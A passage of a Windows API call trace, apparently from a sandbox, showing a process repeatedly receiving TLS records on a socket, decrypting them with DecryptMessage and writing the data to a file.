	[0233.594] WriteFile (in: hFile=0x4c8, lpBuffer=0x32835c4*, nNumberOfBytesToWrite=0x2efc, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32835c4*, lpNumberOfBytesWritten=0x1c80d2c8*=0x2efc, lpOverlapped=0x0) returned 1
	[0233.594] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.594] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.595] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3294660, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3294660, pfQOP=0x0) returned 0x0
	[0233.595] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.596] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.596] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.596] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3294850, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3294850, pfQOP=0x0) returned 0x0
	[0233.596] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.597] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.597] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.597] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3294a40, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3294a40, pfQOP=0x0) returned 0x0
	[0233.597] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.598] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.598] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.598] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3294c30, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3294c30, pfQOP=0x0) returned 0x0
	[0233.598] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.599] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.599] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 8210
	[0233.599] recv (in: s=0x610, buf=0x328003f, len=8206, flags=0 | out: buf=0x328003f*) returned 8206
	[0233.611] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3294e20, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3294e20, pfQOP=0x0) returned 0x0
	[0233.612] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.612] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.612] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.613] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3295010, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3295010, pfQOP=0x0) returned 0x0
	[0233.613] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.614] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.614] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.614] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3295200, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3295200, pfQOP=0x0) returned 0x0
	[0233.614] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.615] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.615] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.615] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x32953f0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x32953f0, pfQOP=0x0) returned 0x0
	[0233.615] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.615] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.616] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 6766
	[0233.616] recv (in: s=0x610, buf=0x327fa9b, len=9650, flags=0 | out: buf=0x327fa9b*) returned 9650
	[0233.636] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x32955e0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x32955e0, pfQOP=0x0) returned 0x0
	[0233.637] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.637] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.637] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.638] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x32957d0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x32957d0, pfQOP=0x0) returned 0x0
	[0233.638] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.639] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.639] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.639] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x32959c0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x32959c0, pfQOP=0x0) returned 0x0
	[0233.639] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.639] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.640] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.640] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3295bb0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3295bb0, pfQOP=0x0) returned 0x0
	[0233.640] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.641] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.641] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 5322
	[0233.641] recv (in: s=0x610, buf=0x327f4f7, len=11094, flags=0 | out: buf=0x327f4f7*) returned 11094
	[0233.653] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3295da0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3295da0, pfQOP=0x0) returned 0x0
	[0233.653] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.653] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.654] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.654] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3295f90, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3295f90, pfQOP=0x0) returned 0x0
	[0233.654] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.655] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.655] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.655] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3296180, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3296180, pfQOP=0x0) returned 0x0
	[0233.655] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.656] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.656] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.656] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3296370, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3296370, pfQOP=0x0) returned 0x0
	[0233.656] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.660] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.660] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.660] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3296560, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3296560, pfQOP=0x0) returned 0x0
	[0233.660] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.661] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.661] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.661] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3296750, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3296750, pfQOP=0x0) returned 0x0
	[0233.661] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.662] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.662] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.662] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3296940, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3296940, pfQOP=0x0) returned 0x0
	[0233.662] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.663] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.663] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.663] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3296b30, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3296b30, pfQOP=0x0) returned 0x0
	[0233.663] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.664] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.664] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.664] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3296d20, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3296d20, pfQOP=0x0) returned 0x0
	[0233.664] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.665] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.665] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.665] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3296f10, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3296f10, pfQOP=0x0) returned 0x0
	[0233.665] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.665] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.666] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16312
	[0233.666] recv (in: s=0x610, buf=0x3281fe5, len=104, flags=0 | out: buf=0x3281fe5*) returned 104
	[0233.667] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3297100, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3297100, pfQOP=0x0) returned 0x0
	[0233.668] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.669] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.669] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.669] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x32972f0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x32972f0, pfQOP=0x0) returned 0x0
	[0233.669] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.670] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.670] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.672] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x32974e0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x32974e0, pfQOP=0x0) returned 0x0
	[0233.676] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.676] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.676] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.677] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x32976d0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x32976d0, pfQOP=0x0) returned 0x0
	[0233.677] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.678] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.678] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.678] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x32978c0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x32978c0, pfQOP=0x0) returned 0x0
	[0233.678] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.678] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.678] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.679] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3297ab0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3297ab0, pfQOP=0x0) returned 0x0
	[0233.679] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.679] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.679] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.679] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3297ca0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3297ca0, pfQOP=0x0) returned 0x0
	[0233.680] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.680] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.680] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.680] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3297e90, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3297e90, pfQOP=0x0) returned 0x0
	[0233.681] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.683] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.684] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.684] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3298080, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3298080, pfQOP=0x0) returned 0x0
	[0233.684] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.684] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.684] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.685] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3298270, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3298270, pfQOP=0x0) returned 0x0
	[0233.685] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.687] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.687] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.687] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3298460, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3298460, pfQOP=0x0) returned 0x0
	[0233.688] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.688] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.688] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.688] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3298650, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3298650, pfQOP=0x0) returned 0x0
	[0233.689] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.689] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.689] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.689] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3298840, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3298840, pfQOP=0x0) returned 0x0
	[0233.690] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.690] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.690] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.691] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3298a30, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3298a30, pfQOP=0x0) returned 0x0
	[0233.692] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.695] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.695] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.695] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3298c20, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3298c20, pfQOP=0x0) returned 0x0
	[0233.696] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.697] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.697] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.697] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3298e10, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3298e10, pfQOP=0x0) returned 0x0
	[0233.697] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.698] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.698] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.698] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3299000, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3299000, pfQOP=0x0) returned 0x0
	[0233.698] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.698] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.699] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
